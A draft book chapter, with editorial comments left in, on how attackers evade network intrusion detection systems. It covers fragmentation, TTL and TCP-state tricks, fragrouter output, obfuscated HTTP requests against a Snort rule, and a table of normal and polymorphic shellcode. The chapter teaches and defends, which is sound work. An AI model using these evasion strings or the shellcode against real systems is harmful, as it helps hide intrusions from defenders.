How about we embed a few of these statements for clairity. The state discussion was just to get the reader accustomed to the idea of state and modeling?
The goals of an attacker as it relates to IDS evasion are twofold: To evade detection completely, or to use techniques and methods that will increase the processing load of the IDS sensor significantly. The more methods employed by attackers at large, on a wide scale, the more vendors will be forced to implement more complex signature matching and packet analysis engines. These complex systems will undoubtedly have lower operating throughputs and more opportunities for evasion. The paradox is that the more complex a system becomes, the more opportunities there are for vulnerabilities! Some say the ratio for bugs to code may be as high as 1:1000, and even conservatives say a ratio of 1:10000 may exist. With these sorts of figures in mind, a system of increasing complexity will undoubtedly lead to new levels of increased insecurity.
Judging False Positives and Negatives
To be an effective tool, an IDS must be able to digest and report information efficiently. A false positive is an event that was triggered that did not actually occur, which may be as innocuous as the download of a signature database (downloading of an IDS signature database may trigger every alarm in the book) or some unusual traffic generated by a networked game. This, although annoying, is usually not of much consequence but can easily happen and is usually tuned down by an initial configuration and burn-in of a Network IDS (NIDS) configuration. However, more dangerous is the possibility for false negatives, which is the failure to alert to an actual event. This would occur in a failure of one of the key functional units of a NIDS. False negatives are the product of a situation in which an attacker modifies their attack payload in order to subvert the detection engine.
False positives have a significant impact on the effectiveness of an IDS sensor. If you are charged with the responsibility of monitoring a device, you will find you become accustomed to its typical behavior. If there is a reasonable number of false positives being detected, the perceived urgency of an alert may be diminished by the fact that there are numerous events being triggered on a daily basis that turn into wild goose chases. In the end, all the power of IDS is ultimately controlled by the single judgment call on whether or not to take action.
Alert Flooding
This problem of making sense of what an IDS reports is apparent again in a flood scenario. Flooding, as you may have guessed, is the process of overloading the IDS by triggering a deluge of alerts. This attack has a number of beneficial actions for an attacker. If the attacker can muster enough firepower in terms of network bandwidth, a Denial of Service (DoS) attack is possible.
Many IDS sensors exasperate this condition by the first match (or multiple match) paradox, in which the sensor has to essentially decide whether or not to alert based on the first match in its database or to attempt further matches. The issue here is that an attacker may identify a low-priority or benign signature common to many IDS signature databases and attempt to reproduce this in a more damaging exploit attempt. If the sensor were to use a first match method, it would produce an alert for the less severe vulnerability and not signal to the true nature of the attack. However, in using the multiple match approach, the IDS allows itself to be more vulnerable to alert flooding attacks. The attacker may simply package an entire signature database into some network traffic and watch the IDS crumble to the ground.
Aside from the desirable condition of failing an IDS sensor, there is the added bonus of having generated an excessive amount of alerts (in excess of 10,000 is no problem at all) that the admin must then somehow make sense of. The intended target host may be totally lost within a dizzying display of messages, beeps and red flags. Trying to identify a real intrusion event may be arduous at best. Let us not forget the psychological impact of seeing what may be construed as an all-out Internet wide assault on your networking equipment. If this style of attack were to somehow become routine, how effective would your IDS solution be then?
Using Packet Level Evasion
Are you going to cover Hailstorm here as indicated in the original outline. Not in this portion of text but somewhere within this Level One Head Section?
I spoke with Ryan about using fragrouter and such in place of Hailstorm. Clicktosecure.com is down and I am unable to get much information about it at this time.
Yes, that is correct.
Network IDSs have the dubious task of making sense of literally millions of pieces of information per second, analyzing information while providing acceptable response times (typically as close to real-time as possible is desired). To break down the effort of data analysis, a NIDS will function on several discrete layers of the network protocol stack. The first layers under inspection will be the network and transport layers, where the attacker has a great opportunity to confuse, circumvent or eliminate a NIDS sensor. If an attacker were to devise a technique that would enable them to evade detection this would be an ideal location to begin, as all other detection capabilities of the IDS rely on the ability to correctly interpret network traffic just as the target host would.
Unfortunately for the defender the characteristics of IP and TCP do not lend themselves to well-defined inspection. These protocols were developed to operate in a dynamic environment, defined by permissive standards that are laden with soft SHOULD" and "MAY statements, MUST being reserved for all butonly the most basic requirements. This lax definition of protocol standards leads to many complications when an attempt is made to interpret network communications. This will leave the door open for an attacker to desynchronize the state of the IDS, such that it does not correctly assemble traffic in the same manner that the target host will. For example, if an IDS signature was crafted to search for the string CODE-RED in any HTTP request, it may be possible for the attacker to fragment his traffic in such a way that it will assemble differently for the IDS as it will for the target host. Therefore, the attacker may exploit the target host without the IDS being able to interpret the event accordingly.
Notes from the Underground
TCP/IP Specification Interpretation
The difficulties inherent in interpreting the TCP/IP specification is is what also leads to many TCP/IP stack fingerprinting opportunities, . anything Anything from the initial TCP sequence number to packet fragment and options handling characteristics may be used to identify a remote OS. This uniqueness of implementation (nmap has over 300 entries in its nmap-os-fingerprints database) has produced some of the most devastating and complex problems for IDS developers to overcome. How to understandThe challenge of decoding what a particular stream of communications may look to the end host without intimate knowledge of the inner workings of its protocol stack is exceedingly complex.
Author: Rephrase for clear grammar in last sidebar sentence.
Several years ago a paper was written to discuss the many issues facing NIDS development. Essentially the attacks discussed in 1998 Thomas Ptacek and Timothy Newshams published1998 "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection ()", vary in style from insertion to evasion attacks. Insertion and evasion are the basis for evading a signature match.
Insertion is the technique which relies upon a si
tuation in whichwhere an IDS will accept some information with the assumption that the target host will also. However, if the IDS does not interpret the network stream in the same manner that the target does, the IDS will have a different understanding of what the communication looks like and will be ineffective in properly alerting to the presence of an attack. The IDS signature will simply not match the data acquired from the network. Our CODE-RED example may be seen to the IDS as CODE-NOT-RED, this I suppose iswhich may be enough for the IDS to feel safe, whereas the target host will actually receive CODE-RED, having dropped the NOT in the middle due to the packet containing it not matching the targets understanding of the standards..
Evasion is the converse of insertion; where it relies upon a situation in which a target system will accept data that the IDS will ignore. An attack may then look something like CODE to the IDS where the target will receive CODE-RED. These sorts of attacks can be enabled in a number of ways. At any time a TCP/IP communication may be terminated by either party. If the IDS were to incorrectly interpret a RST or FIN from an attacker that was not accepted by the target host (e.g. if the IDS did not correctly monitor sequence numbers), the attacker would be free to communicate with impudence.
Denial of Service in IDS implementations is commonplace. The opportunities to subvert the operation of a sensor are quite apparent. System resources are finite; there are only so many pages of memory that can be allocated, ; CPUs are bound and even network IO cards may not be able to maintain consistent throughput despite their speed rating. A Because a computer is a system of queues, some will inevitably fill and spill faster then the data contained may be examined. These issues vary from the micro scale when we are concerned with exhausting the relatively few network IO buffers, to macro issues similar to running low on disk resources. Management of system resources is a complex task that is made exceedingly difficult by requirements to monitor an unknown amount of communication streams and a limited view of the actual internal TCP/IP stack state for each host.
IP Options
Upon examination of an IP header, there are a number of fields in which, with methodical alteration, some insertion or evasion vulnerabilities will become apparent. Mangling the IP header must be done with care; our traffic must still be valid such that it can be routed across the Internet. Modifying the size of a packet may make it difficult for the IDS to understand where the upper layers of the packet begin (evasion). The IP checksum is another good start; if we can interleave invalid IP packets in our stream, the IDS may accept them as valid (if it does not manually calculate the checksum for every packet) where the end system does not (insertion).
Time To Live Attacks
In a typical network configuration, a NIDS would most often be placed on the perimeter of a network. This would enable the NIDS to monitor all communication across the Internet. Unfortunately if an attacker is able to traceroute or methodically reduce the Time to Live (TTL) of the traffic to the target and identify the exact amount of hops required to reach the host, they would then be able to send some packets with an insufficient TTL value. This would have the effect of ensuring the packets with a lower TTL would never reach the target system, but would instead be possessed by the IDS as part of the stream, as seen in Figure 16.1. Luckily administrators may be able to combat this attack by configuring their IDS on the same network segment as the hosts they wish to monitor.
Figure 16.1 TTL Insertion Attack
IP Fragmentation
IP fragmentation reassembly is the basis for a number of attacks. If a NIDS sensor does not reassemble IP fragments in a similar fashion as the target host, it will not be able to match the packet to its signature database. In normal network operations, IP fragments will typically arrive in the order in which they are sent. However, this is not always the case; IP supports difficult-to-analyze out-of-order transmission and overlapping fragment reassembly behaviors. Assembling IP fragments can also become complicated by the requirement to keep fragments in memory until the final fragment is received, in order to complete the assembly of the entire packet. This raises yet another DoS issue; many fragments can be transmitted to consume any internal buffers or structures so that the IDS may begin to drop packets or even crash.
We can further elaborate on this issue when we add the complexity of internal garbage collection. An IDS listening to the wire may have to account for the sessions of several thousand hosts, whereas each host need only be concerned with its own traffic. A host system may allow an excessive amount of time for fragments to arrive in the stream whereas the IDS may have more aggressive timeouts in order to support the management of an exponentially larger system. If the attacker were to send an attack consisting of three fragments and withhold the final fragment until a significant amount of time has expired, and if the NIDS does not have identical internal fragment management processes (something tells me this is next to impossible to attain), it will not have a consistent view of the IP packet and will therefore be incapacitated from any signature matching processes.
Fragmentation Tests
A number of tests conducted by Ptacek and Newsham revealed that at the time of testing none of the IDS platforms that were analyzed could properly interpret a number of IP fragmentation issues. The first two tests covered involved an in-order fragmented payload that was sent in two different sizes (8 and 24 bytes). Further testing was done where 8-byte fragments were sentwith one fragment sent out of order (evasion), with a fragment twice (insertion), with all fragments out of order and one duplicate (combination), by sending the fragment marked as the last fragment first (evasion), and by sending a series of fragments that would overlap the previous (evasion). Startling as it may seem, none of the four products (RealSecure, NetRanger, SessionWall and NFR) were able to handle any of the fragmentation attacks.
Currently most NIDS have updated their fragmentation assembly engines such that they are capable of reconstructing streams with some degrees of success.
TCP Header
The TCP header contains a number of fields that are open to exploitation, and so opportunities for evasion and insertion exist if an IDS were not to fully inspect the TCP header. The CODE field defines the type of message being sent for the connection; if someone were to send an invalid combination or a packet missing the ACK flag it would be possible that the target host would reject the packet where the IDS would not (insertion possible). Segments marked as a SYN may also include data; due to the relative infrequent use of this option for data, an IDS may ignore the contents of these types as well (evasion). We can examine many of the fields in the TCP header and look for any opportunity where a target host will either accept traffic that the IDS does not or vice-versa. Another great example is the Checksum filed, where if the IDS were not manually calculating the checksum for every TCP segment, we may intermix segments with an invalid checksum into our legitimate session with the hope that the IDS will not validate all segments (the vendor may have assumed the processing overhead too great).
TCP recently added a number of new TCP options with RFC 1323, `TCP Extensions for High Performance,'' by V. Jacobson, R. Braden and D. Borman introduce (amongst other things) , Protection Against Wrapped Sequence numbers (PAWS) and the option for non-SYN packets to contain new option flags. This means that if an IDS does not know how a target system may deal with non-SYN packets containing options, there are multiple opportunities for insertion and evasion. The target system may reject this newer form of TCP where the IDS will not, and again the converse is also true. PAWS is a mechanism where a system will have a timestamp associated with each TCP segment. If the target host were to receive a segment with timestamp less then its internal threshold value, it will be dropped. Again and again we see the difficulty with examining TCP data on the wire. There is simply not enough state information transmitted to give an accurate picture of what the behavior will be of a potential target host.
Id love to see a reference to the RFC that covers PAWS here.
TCP Synchronization
Just as there are a number of attack vectors available against strictly IP communications, when we begin to analyze layers above IP, the added complexity and requirements for functionality produce new synchronization challenges. Today most IDS platforms have implemented stateful inspection for TCP.
Stateful inspection requires a number of design decisions about how to identify a communication stream when you examine TCP data. An IDS must be capable of reconstruction a stream in an identical manner as the destination hostif it can not, there will be opportunities for an attacker to subvert the analysis engine. The state information for a TCP session is held in a structure known as a TCP Control Block (TCB). A TCB (containing information like source and destination, sequence numbers and current state) will be required for each session that a NIDS will monitor. The three attack vectors that Ptacek and Newsham identified are as follows:
TCB creation
Stream reassembly
TCB teardown.
An IDS would have to participate in these processes to identify new sessions, monitor open connections, and to identify when it is appropriate to stop monitoring.
TCB Creation
Understanding how to begin monitoring a connection poses some interesting challenges. Should the NIDS simply monitor the TCP handshake processes and build a TCB at this time? Can the NIDS effectively establish a TCB for a connection for which it did not see a SYN (connections that were active before the monitor)?
There are unique challenges with any technique used to establish a TCB. It would be desirable for the IDS to be able to monitor connections for which it did not see an initial Three Way Handshake (3WH). If not, an attacker could establish a connection and wait a significant amount of time; the IDS may reboot and then be unable to track the already established connection.
It is possible to only use ACK packets for TCB creation. This is known as synching on data''. With the added benefit of being able to identify sessions for which a 3WH has not been inspected. There are a number of drawbacks, one being that the IDS will likely inspect excessive amounts of data as it will not be able to differentiate packets not part of a stream from established connections. Another issue is that syncing on data causes a dependence on accurate sequence number checking. The attacker may be able to desynchronize the IDS by spoofing erroneous data before attempting the attack.
An alternate technique to TCB creation is to require a SYN+ACK combination to be seen. This will have the added benefit that it is nearly impossible for the attacker to effect the ACK from the target network. This will enable the IDS to identify which host is the server and client. However, the IDS may be able to be tricked into opening tracking many connections for non-existent hosts (DoS). A SYN+ACK can be easily spoofed without requiring the final ACK from the originating host and care should be taken when relying on this mechanism for TCB creation.
A combination of methods is usually the best strategy, building on the strengths while attempting to eliminate the weaknesses of each technique.
Stream Reassembly
A number of similar issues exist for TCP stream reassembly as for IP fragmentation assembly. The TCP segments may arrive out of order, overlap and possibly be redundant. The IDS must take special care to monitor the sequence numbers of each connection to ensure they do not get desynchronized (difficult to do in a heavily loaded environment).
Again, the difficulty with interpreting the possible behavior of the destination host, while not knowing the particulars about its TCP/IP stack implementation, is quite challenging. In the case of a redundant TCP segment, some hosts may retain the older frame, while others may discard in favor of the most recently received.
If an IDS hopes to maintain a consistent view of the traffic being evaluated, it must also be weary of the advertised windows size for each connection; this value is often tuned during a session to ensure maximum throughput. If an IDS were to lose sight of the size of the TCP window, it may be vulnerable to an easy insertion attack where the attacker simply sends in excess of the window size, in which case the destination host will simply drop packets that were received outside of its advertised size.
TCB Teardown
To ensure that a DoS condition does not occur, proper garbage collection must take place. There are some challenges here. Connections may terminate at any time, with or without notice. Some systems may not require RST segments to be properly sequenced. The Internet Control Message Protocol (ICMP) may even terminate a connection; most hosts will respect an ICMP destination unreachable message as an appropriate signal for termination. If the IDS is not aware of these semantics it may become desynchronized and unable to track new connections with similar parameters.
There will almost undoubtedly be some timeout for any established connection to prevent some logic error from eventually leaking memory. This will also lead to an attack that we had eludedalluded to earlier. Most hosts do not employ keep-alive messages for all connections. This leaves an IDS in an undesirable position where an attacker may simply wait for an excessive amount of time and possibly simultaneously provoke the IDS to become more aggressive with its garbage collection (by establishing many new connections). If successful, the attacker will be able to send whatever attacks they wish, undetected.
Using Fragrouter and Congestant
Theory is not enough for some to make a judgment on the performance of security products. We have seen time and time again that many vendors do not heed the warning of the research community. To adequately illustrate the vulnerabilities that NIDS face, Dug Song released fragrouter in September 1999 (). Fragrouter's benefit is that it will enable an attacker to use the same tools and exploits they have always used without modification. Fragrouter functions, as its name suggests, as a sort of fragmenting router. It implements most of the attacks described in the Ptacek and Newsham paper.
Congestant is another great tool that implements a number of anti-IDS packet mangling techniques. This is a product ofwas authored by "horizon" and was first released in December 1998 in his paper, Defeating Sniffers and Intrusion Detection Systems (www.phrack.org/show.php?p=54&a=10) for phrack 54. The difference here is that congestant Congestant is implemented as a shared library or a kernel patch to OpenBSD. You may find that it is possible to use these tools concurrently for some added confusion for the IDS sensor.
Increasing the processing overhead and complexity of IDS sensors is of benefit to an attacker; these systems become more prone to DoS and less likely to perform in an environment of extreme stress (large amount number of packets per second). It is a certainty that there will always be more features and options added to IDSs as they mature, as an attacker will always attempt to identify the critical execution path (the most CPU intensive operation an IDS may make) in attempts to stress an IDS sensor.
Id love to see some detail here. These programs are designed to be pretty transparent. And chance you could print a before-and-after packet going through fragrouter?
Here is the output when running fragrouter from a shell, its pretty plug-and-play, you just need to ensure that your system will route through the fragrouter host to reach the target.
storm:~/dl/fragrouter-1.6# ./fragrouter -F5
fragrouter: frag-5: out of order 8-byte fragments, one duplicate
truncated-tcp 8 (frag 21150:8@0+)
10.10.42.9 > 10.10.42.3: (frag 21150:8@16+)
10.10.42.9 > 10.10.42.3: (frag 21150:8@8+)
10.10.42.9 > 10.10.42.3: (frag 21150:8@16+)
10.10.42.9 > 10.10.42.3: (frag 21150:4@24)
truncated-tcp 8 (frag 57499:8@0+)
10.10.42.9 > 10.10.42.3: (frag 57499:8@8+)
10.10.42.9 > 10.10.42.3: (frag 57499:8@8+)
10.10.42.9 > 10.10.42.3: (frag 57499:4@16)
truncated-tcp 8 (frag 57500:8@0+)
10.10.42.9 > 10.10.42.3: (frag 57500:8@8+)
10.10.42.9 > 10.10.42.3: (frag 57500:8@8+)
10.10.42.9 > 10.10.42.3: (frag 57500:4@16)
truncated-tcp 8 (frag 58289:8@0+)
10.10.42.9 > 10.10.42.3: (frag 58289:8@8+)
10.10.42.9 > 10.10.42.3: (frag 58289:8@8+)
10.10.42.9 > 10.10.42.3: (frag 58289:4@16)
Here is a comparison of what the tcpdump output from the F5 fragrouter: frag-5: out of order 8-byte fragments, one duplicate technique would appear against normal traffic. Note the DF (Dont Fragment) flags on every packet of a normal connection and that the fragrouter stream has several fragmented packets.
Before (no fragrouter):
19:36:52.469751 10.10.42.9.32920 > 10.10.42.3.7: S 1180574360:1180574360(0) win 24820 <nop,nop,sackOK,mss 1460> (DF)
19:36:52.469815 10.10.42.9.32920 > 10.10.42.3.7: S 1180574360:1180574360(0) win 24820 <nop,nop,sackOK,mss 1460> (DF)
19:36:52.470822 10.10.42.9.32920 > 10.10.42.3.7: . ack 4206722337 win 24820 (DF)
19:36:52.470841 10.10.42.9.32920 > 10.10.42.3.7: . ack 1 win 24820 (DF)
19:36:53.165813 10.10.42.9.32920 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF)
19:36:53.165884 10.10.42.9.32920 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF)
19:36:53.171968 10.10.42.9.32920 > 10.10.42.3.7: . ack 2 win 24820 (DF)
19:36:53.171984 10.10.42.9.32920 > 10.10.42.3.7: . ack 2 win 24820 (DF)
After (with fragrouter):
19:37:29.528452 10.10.42.9.32921 > 10.10.42.3.7: S 1189855959:1189855959(0) win 24820 <nop,nop,sackOK,mss 1460> (DF)
19:37:29.528527 10.10.42.9.32921 > 10.10.42.3.7: S 1189855959:1189855959(0) win 24820 <nop,nop,sackOK,mss 1460> (DF)
19:37:29.529167 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 21150:8@0+)
19:37:29.529532 10.10.42.9.32921 > 10.10.42.3.7: . ack 4211652507 win 24820 (DF)
19:37:29.529564 10.10.42.9.32921 > 10.10.42.3.7: . ack 1 win 24820 (DF)
19:37:29.530293 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 57499:8@0+)
19:37:30.309450 10.10.42.9.32921 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF)
19:37:30.309530 10.10.42.9.32921 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF)
19:37:30.310082 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 57500:8@0+)
19:37:30.316337 10.10.42.9.32921 > 10.10.42.3.7: . ack 2 win 24820 (DF)
19:37:30.316357 10.10.42.9.32921 > 10.10.42.3.7: . ack 2 win 24820 (DF)
19:37:30.316695 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 58289:8@0+)
Countermeasures
For those wishing to implement NIDS throughout their network infrastructure, fortunately there are some emerging technologies that help eliminate a great many of these lower-layer protocol vulnerabilities. Protocol normalization, as discussed by Mark Handley and Vern Paxson in May 2001 in Network Intrusion Detection: Evasion, Traffic Normalization, and End-to-End Protocol Semantics (), is an attempt to scrub or rewrite network traffic as it enters a destination network. This scrubbing process should eliminate many of the difficulties in reconstructing a consistent view of network traffic. If an IDS and target host were both behind a network protocol scrubber, they would both receive an identical picture of the network traffic.
Tools & Traps
Honeynets
Recently there has been an upsurge in the use of honeynets as a defensive tool. A honeynet is a system that is deployed with the intended purpose of being compromised. These are hyper defensive tools that can be implemented at any location inside a network. The current best known configuration type for these tools is where two systems are deployed, one for the bait, the other configured to log all traffic.
The logging host should be configured as a bridge (invisible to any remote attacker) with sufficient disk space to record all network traffic for later analysis. The system behind the logging host can be configured in any fashion. Most systems are quite simply bait, meaning that they are designed to be the most attractive target on a network segment. It is the hope of the defender that all attackers would see this easy point of presence and target their attacks in that direction. Although it has been seen that there is cause to have bait systems configured identically to other production systems on the target network (hopefully hardened), so that if an attackers presence is detected on the honeynet (nobody can transmit any data to this system without detection), the defender can be sure that there are vulnerabilities in their production configuration. And with the added benefit of detailed logging, some low level forensics will typically reveal the vulnerability information along with any backdoors the intruder used to maintain their foothold.
Luckily However, no system is foolproof. Attackers should be able to discern that they are behind a bridge by the lack of layer2 traffic and the discrepancy in Media Access Control (MAC) addresses in the bait systems arp cache.
See http://project.honeynet.org for more details.
Using Application Protocol Level Evasion
IDS sensors have the ability to inspect the protocol internals of a communications stream to aid in the detection process. There are two basic strategies that vendors employ: application protocol decoding, where the IDS will attempt to parse the network input to determine the legitimacy of the service request, and simple signature matching. Both of these approaches have their own unique challenges and benefits; we will see that most IDSs probably implement a hybrid of these solutions. Opportunities to evade detection are available at every layer of the protocol stack.
Security as an Afterthought
Application developers are typically motivated by features and dollars. We all know that the end user is the ultimate decision maker on the success or failure of software. In an effort to please end users, provide maximum compatibility, and eliminate erroneous conditions, developers make many concessions towardsomit strict compliance of protocol specifications in favor of error correction. It is uncommon for an application to immediately terminate requests upon the first deviation from specified protocolsquite to the contrary, every effort is made to recover from any error in an attempt to service every request possible (thereby maximizing compatibility and possibly increasing interoperability). As security researcher Rain Forest Puppy (known as RFP) stated at the CanSecWest Security Conference 2001, You would be surprised with what passes for legitimate http traffic
RFP (CanSecWest Security Conference 2001). These practices are the downfall of application security they only serve to aid an attacker in allowing additional latitude in which to operate.
That section could be read as either favoring strict compliance, or the opposite. Please re-word to make less ambiguous. Perhaps developers forego strict compliance
Also, RFP has a couple of chapters before this one, so you can assume the reader has heard of him by the time they get here.
Evading a Match
Upgrades, patches and variation of implementation may change the appearance (on the wire) of an application. Signatures, too specific, too general and just plain too stale, are thesea basic issues that continues to thwart IDS attack identification efforts.
If we look back towards our snort signatures, we can see that quite clearly one of them specifies the complete path name for the chgrp command. This signature is supposed to alert to the execution of some command through a Web server. Any attacker who is aware of the semantics for these rules could easily modify their attack to play any number of tricks in hopes of evading this match.
This rule itself is quite specific about the path and name for the chgrp command. We can plainly see that if the command resided in a different directory then /usr/bin, this signature would fail. Also, if the attacker were to simply ensure that their path environment variable were correctly set, they may just issue chgrp, without the complete path to evade a signature match. Should the IDS be configured to alert when any of these variations are present? How many signatures would our IDS have if we were to account for these many variations?
Alternate Data Encodings
Largely implemented to support multiple languages, the standard text sent between a web client and server may be encoded so that it should be interpreted as Unicode. Unicode gives the capability to represent any known symbol (the Unicode value for Yung is U+6C38). It also presents all new challenges to IDS vendors, as these values must be inspected and converted into ASCII ANSI (American National Standards Institute) for standard processing. This challenge is not that difficult to overcome; most systems implement a practice known as protocol normalization. Protocol normalization will take an input string and digest all known encodings, white space, and any protocol-specific delimiters in an attempt to produce the most basic form of the input.
Did you mean ASCII?
Yes
Unfortunately all of the normalizations imaginable cannot overcome the challenge of monitoring closed source software packages. Without detailed information of the inner workings of a system there can be no accounting for undocumented nonstandard features. IIS had one such special-feature: %u#### encoding was allowed as an alternate to the normal Unicode encodings (%####). The famed Code Red worm had used this previously unknown technique to bypass many IDS signatures tuned to match for the specific .ida buffer overflow vulnerability. Lack of information is the worst enemy of a network defender.
Consider the following imaginary attack:
Attack String:
GET /vulnerable.cgi?ATTACK=exploit-code
Signature:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-ATTACKS vulnerable.cgi attempt"; flags:A+; content:"get /vulnerable.cgi?ATTACK=exploit-code";nocase; sid:1337; rev:1; classtype:web-application-attack;)
Modified Attack String:
GET /vulnerable.cgi?ATTACK=<SPACE>exploit-code
The attack here seems to exploit some Common Gateway Interface (CGI) application, and a simple signature is developed to alert to the known vulnerability. This signature would provide a very high level assurance that there would be relatively few false positives, as the exploit-code is embedded right into the signature. However, we can see that if the attacker were able to send a modified attack string, through the use of some additional white space, they should be able to bypass a signature match. This exercise again illustrates the difficulty of signature development. If the signature left out the portion of the exploit code, there may be a great number of false positives, whereas if they embed some of the exploit code, the chance for evasion is greatly increased.
This is an incredibly simplistic example and is not that difficult to overcome. Adequate normalizations should be able to eliminate white space and allow for a signature match.
Web Attack Techniques
A number of Web attack issues have been analyzed by RFP; see for instance A look at whisker's anti-IDS tactics from December 1999 () He has implemented a number of them into his whisker vulnerability scanner. We'll take a look at some of them in the following sections.
Since RFP is working on this book he should probably take a look at this section. From past experience I like him to look at what people are writing about him. THX.
Ryan has sent the chapter to RFP.
Method Matching
The method of a HTTP request informs the server what type of connection to anticipate (GET, HEAD, POST, etc). RFP found that many IDS signatures had completely failed to recognize any other methods. This is a somewhat depressing fact as many IDS vendors claim to be not totally dependent on signature matching to generate an alert.
Directory and File Referencing
A slash, the character that specifies a separation between directory and file names (/), can be represented in a couple of different ways. The simplest form is double or multiple slashes (/some//file.html = /some////file.html). These tricks will fool the simplest signature matches, providing there are no normalizations to counteract.
Another form of the same trick (this works only on IIS Web servers), is to use the DOS slash character (\). If an IDS were not aware of this convention, it would not be able to generate a match.
These tricks work because they can reference a file by a different pathname. Amazingly enough, resolving a pathname is substantially harder then you would think (this is what has lead to a number of remote compromises in IIS, remember Unicode). Dot, the path to the current directory, and double dot, the path to the previous directory, can be used to obfuscate a file reference. An attacker may only need to use his or her imagination in constructing unique paths; all of these are equivalent requests:
GET /some/file.cgi HTTP/1.0
GET /.././some////file.cgi HTTP/1.0
GET /./some//..\..///some/./file.cgi HTTP/1.0
A form of the aforementioned evasions is what RFP calls parameter hiding. This evasion is based on the assumption that some IDSs may only evaluate a request until it encounters a question mark (?) , a hex-encoded value of %3f). This character is typically what will denote that any further parameters are arguments to a Web application. If the IDS simply wanted to alert to the request of a file, it may not fully evaluate the expression. The following two requests are equivalent:
GET /real.file HTTP/1.0
GET /%3f/file/does/not/exist/../../../../../real.file HTTP/1.0
Countermeasures
As discussed previously, a signature based IDS may be able to normalize the communications stream. That is, as it inputs data destined for a HTTP server, it should apply some logic to reduce the input into its lowest common denominator (a single /, or resolving directory references). Partial signature matches may also help, if a sensor does not enforce a strong 100% match, they should be able to account for some variation of many exploit types.
Using Code Morphing Evasion
Polymorphism is the ability to exist in multiple forms, and morphing is the processes that is used to achieve polymorphism. The objective of polymorphic code is to retain the same functional properties while existing in a structurally unique form. A NIDS has only the opportunity to inspect information as it exists on the wire; this would then only allow the structure of the exploit to be inspected. This feature had allowed viruses to remain undetected for quite some time. The only difference is that a virus scanner has the opportunity to inspect disk files instead of network data. The way that most virus scanning engines have tackled this problem is through the use of heuristic scanning techniques; this is similar to what a host based IDS would do (identifying suspicious events, inappropriate file access).
Polymorphism is achieved through taking the original attack payload and encoding it with some form of a reversible algorithm. All of the nop-sled instructions are substituted with suitable replacements. This encoded payload is then sent over the network with a small decoding function prefixed (this decoder is also dynamically generated to avoid a signature match). When the exploit runs on the target, the decoder will unwrap the original payload and execute it. This way, the original functionality is maintained.
nop-sled?
Yup, check out the buffer-overflow chapter.
Polymorphic shellcode is discussed thoroughly in this author's paper that was released in early 2001 (). An engine is included for use in any current or future vulnerabilities. The basis for polymorphic code generation is that there is always more then one way to calculate a value. If, to exploit a vulnerability, we had to calculate the value of 4, we could do any of 2+2, 3+1, 6-2 and so on. There are literally endless methods to calculate a given valuethis is the job of an exploit, the possessing of some machine instructions. To a NIDS examining network traffic there is no way to identify 2+2 being equivalent to 3+1. The NIDS is only given the low-level machine instructions to evaluate against a known pattern; it does not interpret the instructions as the target host will.
This technique has the ability to mask any exploit from detection, from any specific rule to the general. The only opportunity for a signature based NIDS to formulate a match is if a signature for the small decoder is able to be determined. To date I have not seen any signatures or techniques developed for this class of polymorphic shellcode.
Table 16.1 shows a side by side view of two executions of a polymorphic shellcode engine.
What should alignment of multiple items within table columns be?
Table 16.1 Insert Title HereShellcode Variations
Addresses
Normal Shellcode
Possible Polymorphic shellcode #1
Possible Polymorphic shellcode #2
0x8049b00
0x8049b01
0x8049b02
0x8049b03
0x8049b04
0x8049b05
0x8049b06
0x8049b07
0x8049b08
0x8049b09
0x8049b0a
0x8049b0b
0x8049b0c
0x8049b0d
0x8049b0e
0x8049b0f
0x8049b10
0x8049b11
0x8049b12
0x8049b13
0x8049b14
0x8049b16
0x8049b17
0x8049b19
0x8049b1b
0x8049b1e
0x8049b20
0x8049b21
0x8049b23
0x8049b25
0x8049b26
0x8049b28
0x8049b2a
0x8049b2b
0x8049b2d
0x8049b2f
0x8049b31
0x8049b33
0x8049b35
0x8049b36
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
jmp 0x8049b38
pop %esi
mov %esi,%ebx
mov %esi,%edi
add $0x7,%edi
xor %eax,%eax
stos %al,%es:(%edi)
mov %edi,%ecx
mov %esi,%eax
stos %eax,%es:(%edi)
mov %edi,%edx
xor %eax,%eax
stos %eax,%es:(%edi)
mov $0x8,%al
add $0x3,%al
int $0x80
xor %ebx,%ebx
mov %ebx,%eax
inc %eax
int $0x80
push %ebx
cmc
pop %edx
xchg %eax,%edx
lahf
aas
push %esi
push %esp
clc
push %edx
push %esi
xchg %eax,%ebx
dec %ebp
pop %ecx
inc %edi
dec %edi
inc %ecx
sahf
pop %edi
sti
push %esp
repz dec %eax
push %ebp
dec %esp
pop %eax
loope 0x804da1b
js 0x804d994
daa
sbb $0x15,%al
pop %eax
out %eax,(%dx)
push %ebp
dec %edi
jp 0x804d966
movl %es:(%ecx),%ss
mov $0x15d5b76c,%ebp
adc %edi,(%edi)
loopne 0x804d9a0
push %ebp
xchg %eax,%ecx
das
pushf
inc %ecx
xchg %eax,%ebp
pop %edi
push %edi
dec %ebp
dec %ebx
lahf
xchg %eax,%edx
push %ebx
pushf
inc %esp
fwait
lahf
pop %edi
dec %ecx
dec %eax
cwtl
dec %esp
xchg %eax,%ebx
sarb $0x45,(%ecx)
mov 0xffffff90(%ebx),%ebp
dec %edi
mov $0xd20c56e5,%edi
imul $0x36,0xee498845(%esi),%ebx
dec %ecx
and %ah,%cl
jl 0x804da3d
out %al,$0x64
add %edi,%eax
sarl %cl,0x4caaa2a0(%ebp,%eax,2)
nop
cmp 0x5cd8733(%eax),%ebx
movsl %ds:(%esi),%es:(%edi)
push %ss
int $0x14
push $0xbffff586
xchg %dh,%ch
(bad)
As you can plainly see, there is very little correlation between the three executions. There are very many possibilities There are a huge number of permutations that can be used.
Unfinished thought?
Whats the (bad) there?
That is part of the encoded shellcode, its value did not decode by gdb as a valid instruction so it just pops up as (bad).
Countermeasure
